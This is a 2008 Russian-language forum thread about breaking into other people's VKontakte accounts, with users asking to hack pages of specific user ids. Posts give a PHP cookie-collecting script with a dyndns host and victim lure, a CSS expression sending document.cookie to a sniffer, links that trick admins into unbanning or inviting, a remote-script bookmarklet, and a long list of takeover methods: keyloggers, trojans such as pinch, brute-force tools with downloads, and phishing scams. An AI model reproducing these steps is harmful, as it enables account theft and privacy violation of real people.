RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-11 19:31:57.876666
|
|
|
ruslanmin
Сообщений: 2
Оценки: 0
Присоединился: 2008-10-08 22:34:57.870000
|
помогите разобраться :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-11 20:53:35.066666
|
|
|
Evolution Unknown
Сообщений: 203
Оценки: 0
Присоединился: 2008-07-28 17:12:17.763333
|
Гы. Вчера у Пашки была днюха и я засветился на стене, теперь куча уродов флудят у меня на стене по теме ОНОТОЕ следит за вами :D
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-13 00:43:25.110000
|
|
|
zhuk
Сообщений: 2962
Оценки: 10
Присоединился: 2007-02-20 21:00:01.303333
|
Если стащил куки, зачем расшифровывать? Подставь вместо своих… Или я чего-то не понимаю…
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-14 23:14:25.403333
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
Блин, не тема, а аццтой какой-то, чесно! Молодцы! нашли как куки воровать и подставлять… нет бы реальную дыру найти, да просенькую бы, как ксс…))) было бы круто)) уже бы весь контакт состоял из "дебилов")))))))))) Ну всмысле поугарали бы там конкретно :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-14 23:57:43.140000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: zhuk
Если стащил куки, зачем расшифровывать? Подставь вместо своих… Или я чего-то не понимаю…
ну как бы есть зачем, просто куки - кукам рознь, бывает просто сессия, а бывает и не просто
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-15 17:15:44.953333
|
|
|
Виталька
Сообщений: 3
Оценки: 0
Присоединился: 2008-10-13 22:11:23.493333
|
народ, извините что не в тему, но не могли бы вы подсказать темы где написано что нибудь по взлому Мур-Клуба…плиз очень надо
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-15 21:31:48.316666
|
|
|
Master of Ceremony
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-15 21:22:07.440000
|
Ребят, помогите пожалуйста. Мне очень нужно зайти на скрытую страницу пользователя вконтакте. Вот его id - 4518095. Подскажите как! Заранее благодарен!
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-20 14:16:01.776666
|
|
|
Solider
Сообщений: 2
Оценки: 0
Присоединился: 2008-10-20 14:04:08.930000
|
Люди помогить разобраться как взломать страницу в контакте? http://vkontakte-info.msk.ru/vzlom-4.html#2 а то здесь не хрена не понятно в какой проге делать…
id17387357
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-22 01:16:23.533333
|
|
|
avka
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-22 01:06:50.076666
|
привет! вопрос ко всем, кто может помочь?
как просмотреть фотографии в закрытых профелях сайтов facebook.com и myspace.com вроде бы вконтакте их аналог, но там не так все просто… у меня ((
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-22 15:23:40.823333
|
|
|
RockLviv
Сообщений: 8
Оценки: 0
Присоединился: 2008-09-30 12:41:12.983333
|
Для тех хто украл куки, может помочь сайт http://md5.rednoize.com/
у них очень больша база MD5, i SHA1.
P.S. Ето не реклама:D
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-24 05:37:13.370000
|
|
|
yamayka
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-24 05:28:06.303333
|
на странице отправки сообщения пользователю в форме есть скрытые поля, одно из них <input type="hidden" id="chas" name="chas" value="..." /> Так вот интересует вотпрос каким мокаром получается значение value?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-24 19:30:21.643333
|
|
|
rzer
Сообщений: 2
Оценки: 0
Присоединился: 2008-10-24 19:16:11.730000
|
Спасибо xaxa89 за http://hashkiller.com/ реально помог. Мой способ взломать анкету:
1. Ставим денвер (например appserv)
2. Кладем в корень простенький скрипт с полем cook и пхп кодом (взял за основу http://freestudents.ru/vkontakte/graffiti.php )
<?php
if ($_POST["cook"]){
file_put_contents("cookies.txt",$_POST["cook"]);
}
?>
3. Регимся на dyndns.com получаем себе доменчик типа Vgraffiti.dyndns.com, настраиваем переадресацию в дсл модеме на порт локального сервера
4. Кидаем ссылку жертве - ждем когда все что нужно появится в файле cookies.txt
5. Ломаем md5 с помощью http://hashkiller.com/index.php?action=md5webcrack или http://gdataonline.com/seekhash.php
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-26 13:59:51.656666
|
|
|
belomorinka
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-26 11:03:43.153333
|
rzer, можешь описать поподробнее свой способ.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-28 12:44:10.200000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Ё-моё.. почитите мусор!
По теме - делаем "крОсивый CSS-стиль с хентайскими бабами", пихаем туда expression с window.location.href на сниффер.com?gg=document.cookies, со сниффера тут же редирект обратно по referer. Стиль пиарим, например, в http://vkontakte.ru/club3473197. Толпа юзеров IE пару дней радуется, "шо у меня контакт красивый и не такой как у всех". Старо как мир и работает
//почистил
//oRb
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-29 08:06:31.650000
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
да это старо как контакт :D но думаю многие этого ещё не знают :))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-29 15:48:47.263333
|
|
|
rzer
Сообщений: 2
Оценки: 0
Присоединился: 2008-10-24 19:16:11.730000
|
А кто-нить знает по какому принципу вконтакт определяет флешки с XSS? Просто при загрузке? (что на вряд ли)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-30 13:30:53.246666
|
|
|
maxОN
Сообщений: 23
Оценки: 0
Присоединился: 2008-09-29 22:23:15.806666
|
собсна подскажите как составить куки если md5 хэш получил? :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-10-30 16:59:04.543333
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
ох…чуваки это не топик "раскодируем куки" тут уязвимостями делятся, а не вопросами!!!!!!
но всё же отвечу:
quote:
собсна подскажите как составить куки если md5 хэш получил? :)
Ставь оперу
Инструменты>Дополнительно>cookies там всё понятно!!!
quote:
А кто-нить знает по какому принципу вконтакт определяет флешки с XSS? Просто при загрузке? (что на вряд ли)
да Админам тупо все жалуются мне кажется :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-02 19:41:47.440000
|
|
|
Solider
Сообщений: 2
Оценки: 0
Присоединился: 2008-10-20 14:04:08.930000
|
quote:
ох…чуваки это не топик "раскодируем куки" тут уязвимостями делятся, а не вопросами!!!!!!
но всё же отвечу:
quote:
собсна подскажите как составить куки если md5 хэш получил? :)
Ставь оперу
Инструменты>Дополнительно>cookies там всё понятно!!!
quote:
А кто-нить знает по какому принципу вконтакт определяет флешки с XSS? Просто при загрузке? (что на вряд ли)
да Админам тупо все жалуются мне кажется :)
вот по поводу оперы я чет вставляю id жертвы e-mail случайный и хэш md5 и все ровно на свою страницу захожу там есть строка remixsid ее удаляю приходится сразу логинится мож с ней что нить зделать надо?8|
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-05 11:10:24.556666
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
quote:
e-mail случайный
хм…)))
сопсна нуно мылобы знать!)))
а md5 ИМХО, лучше разшифруй)))
quote:
5. Ломаем md5 с помощью http://hashkiller.com/index.php?action=md5webcrack или http://gdataonline.com/seekhash.php
|
|
|
|
|
RE: [Deleted] - 2008-11-07 11:05:46.210000
|
|
|
austin
Сообщений: 11
Оценки: 0
Присоединился: 2008-11-07 10:15:22.386666
|
Столько всего написано,а вот как взломать не очень понятно!
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-08 13:41:00.753333
|
|
|
dmi3.zkm
Сообщений: 3
Оценки: 0
Присоединился: 2008-11-08 12:57:14.613333
|
Здравствуйте. Как успехи??
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-08 13:44:13.646666
|
|
|
CiD666
Сообщений: 91
Оценки: 0
Присоединился: 2008-08-04 03:23:41.663333
|
мне интересно а нельзя ли увеличить рейтинг путём перехвата пакетов, допустим делаем наш пол в настройках : выберите пол,
рейтинг уменьшается на 2, затем снова выбираем либо женский либо мужской, рейтинг увеличивается на 2, в этот момент перехватываем отсылаемые пакеты, и отсылаем их повторно, возможно ли это??
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-08 14:27:07.590000
|
|
|
dmi3.zkm
Сообщений: 3
Оценки: 0
Присоединился: 2008-11-08 12:57:14.613333
|
кто-нибудь вообще дыру нашел непосредственно в web-приложении?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 01:06:35.636666
|
|
|
Ilya787
Сообщений: 46
Оценки: 0
Присоединился: 2008-05-13 18:32:44.323333
|
Новая пища для размышлений… каким образом сайт "понимает", что и кто сейчас онлайн? Даже при вырубленных скриптах… хм..8|
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 09:55:04.403333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
ORIGINAL: Ilya787
Новая пища для размышлений… каким образом сайт "понимает", что и кто сейчас онлайн? Даже при вырубленных скриптах… хм..8|
~15 минут с момента твоего последнего действия (любой переход на страницу сайта) считается, что пользователь в сети.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 12:59:01.323333
|
|
|
dmi3.zkm
Сообщений: 3
Оценки: 0
Присоединился: 2008-11-08 12:57:14.613333
|
есть SQL Injection, если я ничего не попутал…
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 15:48:15.626666
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
да хрен когда сломают этот долбаный контакт…. а если сломают - то не расскажут. ничего на нем не сделаешь - паша дуров хорошо постарался. Не дыры, ничего…. :(:(:(
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 15:50:43.986666
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
quote:
мне интересно а нельзя ли увеличить рейтинг путём перехвата пакетов, допустим делаем наш пол в настройках : выберите пол,
рейтинг уменьшается на 2, затем снова выбираем либо женский либо мужской, рейтинг увеличивается на 2, в этот момент перехватываем отсылаемые пакеты, и отсылаем их повторно, возможно ли это??
а кстати ты хорошо про пакеты придумал… тока вот как их перехватить? да и ваще нахрен нужен этот рейтинг… взять бы там админку, которой небось в помине нету)))))) n милионов пользователей))) ото стеб бы был))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 16:03:38.580000
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
народ, еще пища для рызмышления…)) у меня стоит опера 9.62, когда я на своей странице вконтакте нажимаю правой кнопкой и "Соблюдены ли веб-стандарты", то оно переходит на какой-то сайт и показывает, что на странице 891 ошибка (не восеьсот девяносто первая, в 89одна)… мож этим мона помоч?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-11 16:25:33.580000
|
|
|
DeaDevil
Сообщений: 514
Оценки: 0
Присоединился: 2008-02-09 08:31:06.386666
|
quote:
Infina15 quote:
ORIGINAL: Infina15
народ, еще пища для рызмышления…)) у меня стоит опера 9.62, когда я на своей странице вконтакте нажимаю правой кнопкой и "Соблюдены ли веб-стандарты", то оно переходит на какой-то сайт и показывает, что на странице 891 ошибка (не восеьсот девяносто первая, в 89одна)… мож этим мона помоч?
Нет, этим к сожалению ты нам не поможешь.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-13 21:06:20.140000
|
|
|
CiD666
Сообщений: 91
Оценки: 0
Присоединился: 2008-08-04 03:23:41.663333
|
quote:
а кстати ты хорошо про пакеты придумал… тока вот как их перехватить? да и ваще нахрен нужен этот рейтинг… взять бы там админку, которой небось в помине нету)))))) n милионов пользователей))) ото стеб бы был))
есть уйма прог, почему никто не обсуждает??
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-13 21:36:04.946666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
да…. лучше сразу взять админку, жестко ее похакать!!! чего там, ето же так просто, как 2 пальца об асфальт!! и проги есть! да, именно для жесткого хака сайтов!!!
действительно, почему ими никто на пользуется? обьясните, ПЛИЗ!!! Я ЛАМЕР!!!! ПАМАГИТЕ!!!
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-13 22:01:04.690000
|
|
|
CiD666
Сообщений: 91
Оценки: 0
Присоединился: 2008-08-04 03:23:41.663333
|
quote:
да…. лучше сразу взять админку, жестко ее похакать!!! чего там, ето же так просто, как 2 пальца об асфальт!! и проги есть! да, именно для жесткого хака сайтов!!!
действительно, почему ими никто на пользуется? обьясните, ПЛИЗ!!! Я ЛАМЕР!!!! ПАМАГИТЕ!!!
хахаха, жжошь [sm=be.gif] ппц у тя юмор…[sm=by.gif][sm=au.gif] ссори за флуд
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-14 00:02:53.870000
|
|
|
GaLoPoM
Сообщений: 1
Оценки: 0
Присоединился: 2008-11-12 21:14:52.653333
|
Быть в Offline
внимание! этот способ только для пользователей Mozilla Firefox,хотя это не говорит о том,4то б отказываца от опера,
на мой взгляд она всеравно продвинутей…йа проэксперементировал ниже изложенный метод 1000 раз,
все норм по этому и выкладываю.
1. итак, открываем Firefox
2. в адресной строке вводим about:config, откроются все настройки браузера
3. в поле filter вводим network.http.redirection-limit
4. внизу появится только этот параметр, меняем его значение на 0 (тем самым запрещаем обрабатывать переадресации)
5. открываем новую вкладку (Ctrl+T), грузим страницу входа http://vkontakte.ru/login.php и логинимся на вконтакт
6. вылезет ошибка, но так и должно быть.
7. идем на какую-нить другую страницу, например, http://vkontakte.ru/friend.php
8. возвращаемся во вкладку с настройками и меняем значение параметра на дефолтное (у меня это 20)
теперь вы в контакте) но в инвизе, обходим ссылки с profile.php и вы будете для ваших друзей в оффлайне
Для пользователей других браузеров главное - не заходить на страницы, в строке браузера которых появляется profile.
Неправильная дата рождения
1. Редактировать мою страницу
2. Открываем исходный текст.
3. Находим строки с датами. Меняем <option value="1">1</option> на <option value="33">33</option> и
<option value="1996">1996</option> на
<option value="3333">3333</option>
4. Применить изменения.
5. В редактировании страницы выбрать эти числа
6. Сохранить.
ВНИМАНИЕ!!!
¯¯¯¯¯¯¯¯¯¯¯
Любые изменения Вашей страницы после этого УДАЛЯТ неправильную дату, и Вам придется делать её заново.
Название группы в столбик———————————————————————————————————————————————————————–
Зайди Вконтакт, и нажми редактировать название группы!
Затем!
Нажми в Опере Ctrl + F3 потом Ctrl + F и в открывшееся окно введи следущее!
<input type='text' class='inputText' id='name' name='name' maxlength='100' size='50' autocomplete='off'
Затем замени тег input на тег textarea!
Нажимаешь применить изменения! Всё
только для оперы.
================================================
ВНИМАНИЕ,теперь работает только при создании группы
ищем строку - <input class='inputText' autocomplete='off' type=text name='name' style='width: 200px;' value="">
Аккаунт без имени———————————————————————————————————————————————————————————
Анна =)) АНкА =)) Ерёменко
25 сен 2008 в 12:02
При регистрации аккаунта нужно ввести пробелы в этих местах. Ни в коем случае не писать никнейм. Иначе он появится вместо имени и всё напрасно.
С уже существующим аккаунтом такого сделать НЕЛЬЗЯ.
Кто отправил мнение——————————————————————————————————————————————————————————
1 способ:
¯¯¯¯¯¯¯¯¯
Удалите всех, кто согласился на Ваше предложение.
В ответ на анонимное мнение отправляете сообщение, содеожащее ссылку
vkontakte. ru/matches.php?act=a_sent&to_id=ВАШ_ID_АДРЕС&dec=1
(пробел убрать)
Чтобы пользователь перешел по ссылке, в письме напишите что-то вроде : "ты ЭТО видел????? Я в шоке был, если честно…"
Прейдя по этой ссылке, человек автоматически отвечает на Ваше предложение, и Вы можете лего его увидеть.
2 способ:
¯¯¯¯¯¯¯¯¯
Добавляете искомое мнение в "черный список". Смотрите, какие еще мнения добавились в него. Значит, они все от одного человека. Далее - дело логики и техники…
P.S. Этот способ только для тех случаев, когда мнений от этого пользователя было несколько.
Очистить стену——————————————————————————————————————————————————————————————
http://blog.x-code.name/2008/05/29/33/
Скрипт для очистки стены VKontakte
Смайлы—————————————————————————————————————————————————————————————————-
Открой http://oleg.sunoni.net/smileys.user.js
Скопируй текст этого скрипта. Открой блокнот. Кликни ПРАВОЙ кнопкой мыши и нажми "Вставить". Сохрани полученный файл под именем Smiles.js в любой папке.
Заходишь в Оперу. Жмешь последовательно:
«Инструменты» > «Настройки» > «Дополнительно» > «Содержимое» > «Параметры JavaSсript» > поле «Файлы пользователя JavaSсript».
Здесь указываешь путь к папке, куда ты сохранила Smiles.js. Сохраняешь.
Семейное положение———————————————————————————————————————————————————————————–
Единственное изменение в семейном положении - это пустое.
Заходите в редактирование страницы. Открываете исходный код. Находите текст:
<option value="6">В активном поиске</option>
Под этой строкой вставляете это:
<option value="7"> </option>
Применяете изменения. В семейном положении выбираете пустую строчку. Сохраняете. Выходите на Вашу страницу.
ВНИМАНИЕ!!!
¯¯¯¯¯¯¯¯¯¯¯
Любые изменения Вашей страницы после этого УДАЛЯТ неправильное семейное положение, и Вам придется делать его заново.
НУЖНЫЕ ССЫЛКИ—————————————————————————————————————————————————————————————
1. Последние 10 статусов:
http://vkontakte.ru/profile.php?id=[ТВОЙ ID]&activityhistory=1
2. Как вступить в закрытую группу. Надо отправить администратоу группы ссылку:
http://vkontakte.ru/groups.php?act=ajaxinv&gid=[id закрытой группы]&id=[твой id]
Если он перейдет, то тебе вышлоется приглашение в группу.
3. Добавить человека в закладки
http://vkontakte.ru/fave.php?act=addPerson&mid=X…
(Вместо XXXXXX ввести Id)
4. Выход из бана группы.
Отправить администратору ссылку
http://vkontakte.ru/groups.php?act=unban&gid=[ID_ГРУППЫ]&id=[ТВОЙ_ID]
5. Выход из чёрного списка пользователя
Отправить ему ссылку
http://vkontakte.ru/settings.php?act=delFromBlackList&id=[ТВОЙ_ID]
6. Поиск людей по возрасту
http://vkontakte.ru/search.php?byear=1989 (ввести нужный год)
Скипты———————————————————————————————————————————————————————————————-
1. Календарь и часы:
Скачать: http://www.sharemania.ru/0107570
2. Vkontakte Optimizer
Скачать здесь: http://vkopt.110mb.com/
3.Скрипт для закачки аудио:
Скачать: http://www.grayface.n m.ru/vkSound.rar (пробел убрать)
4. Брут Vkontakte
Скачать: http://depositfiles.com/files/4565418
Скачать: http://www.sekrets.okis.ru/file/sekrets/Vkontakte.rar
Внимание! Если появляется ошибка инициализации, значит, не судьба.
5. Download Music from Vkontakte.ru.
Скачать: http://network.borovichi.ru/forum/index.php?act=atta…
При активации данного скрипта, у каждой аудиозаписи появляется прямая ссылка на файл. При переходе по ней запускется менеджер закачек (если он у Вас есть, конечно же) или диалог загрузки файла.
6. Download Video from Vkontakte.ru. Аналогично предыдущему сценарию, можно скачать любой видеоролик.
Скачать: http://network.borovichi.ru/forum/index.php?act=atta…
7. Photos Paths from Vkontakte.ru. При просмотре фотоальбомов появляется кнопка "Image Paths >>", нажатие на которую выводит прямые пути ко всем фотографиям страницы.
Скачать: http://network.borovichi.ru/forum/index.php?act=atta…
8. Vkontakte Mail Page Improver выделяет непрочитанные сообщения контрастным черным цветом.
Скачать: http://network.borovichi.ru/forum/index.php?act=atta…
9. Просмотр информации о закрытой странице.
Заходим на страницу закрытого пользователя. Вводим в адрсной строке вот это: javasсript:(function(){var%20s=document.createElement('sсriрt');%20s.src='http://tosamoepalevo.googlepages.com/showLinks.js';%20s.type='text/javasсript';%20document.getElementsByTagName('head')[0].appendChild(s);})();
(Чтобы вручную не менять слова в адресной строке. Очень удобно.)
10. скрипт Автовступления в группы
вводим все параметры и от чего и до чего. Запускаем.
Скачать - http://slil.ru/25838964
Протетстированно : http://vkontakte.ru/id13720689
Блог : http://qawsed.ru/
Частично взято с сайтов:
http://network.borovichi.ru
http://tosamoepalevo.blogspot.com/2008/07/blog-post….
Я не забыл и ОПЕРУ:
Opera: Создайте на компьютере папку для скриптов и скачайте туда скрипт с расширением .js. Эту папку впишите в настройках Opera: «Tools» > «Preferences» > «Advanced» > «Content» > «JavaSсript options» > поле «User JavaSсript files»
русский: «Инструмент» > «Настройки» > «Дополнительно» > «Содержание» > «Параметры JavaSсript» > поле «Мои файлы JavaSсript»
\\
color=red]ВЗЛОМ СТРАНИЧКИ———————————————————————————————————————————————————————————-
Итак.
Короче, угнать пароль от аккаунта можно несколькими способами.
1. если ты хорошо знаешь человека, через систему восстановления пароля. Подбираешь сам, исходя из умственного развития жертвы по части компьютера.
2. Если ты имеешь доступ к компу жертвы, хотя бы изредка, то можешь поставить на тот комп программу Punto Switcher, она меняет языки сама, прога безобидная, но в ней есть функция дневника, которая записывает всё, что было набрано на клавиатуре.
3. Похожий способ. Любой кейлоггер (это программа, принцип действия которой, как у выше написанной, только все данные она может отправлять тебе на мыло.
4. Шпион. Это прога для записи скриншотов экрана. Для пароля мало поможет, но мыло и много интересной информации узнать можно. В сочетании с кейлоггером (любым) вообще вещь классная.
5. Тупо троян. Для простоты можно взять pinch или alb20. Они простые, особенно второй, и к нему всегда при скачке дается подробная инструкция.
6. Через cookies. Если чувак лох и пройдет по нужной ссылке, то он может оставить кукисы там, где ты укажешь, вставляешь их вместо своих и ты на другом аккаунте.
7. Социнженерия. Самый распространенный способ. Вот его пример:
тебе на почту приходит письмо такого содержания:
Прикинь, я научился!!! Короче, есть такая фигня на мыле, автовозврат пароля, раньше она была нужна для того, чтобы вернуть пароль, если забыл, а я сообразил, чтобы мне присылали пароли от других ящиков! Короче, отправляешь на мыло auto_pass_return@mail.ru письмо.
В теме письма пишешь auto_password_return
В самом письме пишешь так:
*##&%auto_pass_back__%& #mail_return&_(пишешь мыло жертвы)$%___&*#mail_back&*(твое мыло)#%%*__password_is_Ok_&$%_#(твой пароль для возврата пасса)&*return@#
И тебе присылается пароль не от твоего ящика, так как он уже указан, а от ящика жертвы!!!! Поробуй! Пара лишних угнанных ящиков не помешает!!!"
Вот такого типа письмо тебе приходит)))) Ты ведешься, думаешь, о, круто!!! И отправляешь мыло жертвы, свое мыло и СВОЙ ПАРОЛЬ на солидный адрес auto_pass_return@mail.ru
На самом деле этот ящик принадлежит тому чуваку, который прислал тебе это письмо… У меня самой есть два ящика с подобными именами))) В итоге, ты не только НЕ ПОЛУЧАЕШЬ НОВОГО, но и отдаешь свой ящик.
Но развод хороший) Для лохов самое оно)))
Это самые простые способы.
Есть еще брут, это перебор паролей. Для этого есть специальные программы, например, brutus или brutus new. Сюда же подходит скрипт, о котором Вы можете прочитать здесь: http://vkontakte.ru/note7168092?oid=757629.
Еще один способ - это программа-взлом страниц контакта.
Скачать тут: http://www.sekrets.okis.ru/file/sekrets/Vkontakte.rar
Это самые основные моменты для начинающих.
ВНИМАНИЕ!!!! Взлом аккаунта Vkontakte больше невозможен при помощи брутфорсера.ВРОДЕ!!!!!
Вводите текст. После его ввода жмете Enter и прямо под текстом вводите & # 175; (без пробелов). Первый символ будет подчеркнутым. Если хотите подчеркнуть все символы, вводите столько раз, сколько нужно подчеркиваний.
Вот так
¯¯¯¯¯¯¯
& # 191; - ¿
& # 9398; - Ⓐ
& # 9552; - ═
& # 9760; - ☠
& # 9773; - ☭
& # 21328; - 卐
ТОЛЬКО ОБЯЗАТЕЛЬНО БЕЗ ПРОБЕЛОВ,ТОЧКУ С ЗАПЯТОЙ ТОЖ КОПИРУЕМ…..
если не выходит, ЧИТАЙ ВНИМАТЕЛЬНО!!!!!
☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭☭
Просмотр закрытых страниц
http://vkontakte.ru/photos.php?act=user&id=0000 - фотографии на которых отмечен человек (0000 - id человека)
http://vkontakte.ru/video.php?act=tagview&id=0000 - видео на которых отмечен человек (0000 - id человека)
http://vkontakte.ru/photos.php?id=0000 - фотоальбомы (0000 - id человека)
http://vkontakte.ru/video.php?id=0000 - видеозаписи (0000 - id человека)
http://vkontakte.ru/notes.php?id=0000 - заметки (0000 - id человека)
http://vkontakte.ru/groups.php?id=0000 - группы (0000 - id человека)
http://vkontakte.ru/audio.php?id=0000 - аудиозаписи (0000 - id человека)
http://vkontakte.ru/rate.php?act=vote&id=0000 - рейтинг страницы (0000 - id человека)
http://vkontakte.ru/apps.php?mid=0000 - приложения (0000 - id человека)
http://vkontakte.ru/questions.php?mid=0000 - вопросы (0000 - id человека)
ЧТО ЗНАЛ…… ВСЁ НАПИСАЛ…..
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-14 01:14:38.340000
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
клевая статья!)) спасибо) сори ща флуд)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-18 15:04:44.223333
|
|
|
qsad
Сообщений: 18
Оценки: 0
Присоединился: 2008-10-15 16:57:33.546666
|
иногда бывают тесты новых модулей - vkontakte.ru/test.php
часть админки!! - vkontakte.ru/admin.php?act=error_item
баг со стеной - напишите на стене любого человека "! любой текст" - увидете что будет.(без кавычек)
куча новых тестирующихся языков. пример - http://vkontakte.ru/settings.php?act=lang&l=chv
и багов еще оч многа)
кстати еще советую прогу Его Акк, ломает все аффигенно)))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-18 19:49:52.333333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
баг со стеной - напишите на стене любого человека "! любой текст" - увидете что будет.(без кавычек)
не баг, а фича. Сорсец бы посмотрели.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-18 20:59:52.800000
|
|
|
Infina15
Сообщений: 27
Оценки: 0
Присоединился: 2008-10-06 17:33:49.256666
|
я тут пробил, что в куках надо указать тока значение remixsid и всё! больше ничего не надо! вот сами попробуйте… у меня даже без remixpass зашло. кстати хеш remixsid так интересно сделан, что под его разшифровку не подходят ни id не пасс. странно как-то))) и кстати, если удалить куки, потом заново проходить авторизацию, значение хеша меняется… вот знать бы от чего оно зависит.. мож там все просто на самом деле)) так и контакт уже мона ломать как не фиг… а админская панель, я думаю, на каких-то определенных аккаунтах:) например тут
Еще, если удалять тока remixsid, все работает, тока при обновлении страницы контакта, значение remixSid меняется на новое. Может оно как-то сайтом конфигурируется? Может от количества посещений данной страницы при последнем посещении ее тобой? просто надо знать либо было и хеш пароля MD5, либо вот эту remixSpass…. чеж делать то….
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-11-19 14:02:44.546666
|
|
|
qsad
Сообщений: 18
Оценки: 0
Присоединился: 2008-10-15 16:57:33.546666
|
возможно remixsid составляется от смеси соли твоего ид емаила пароля и от времени последнего захода)
|
|
|
|
|
|
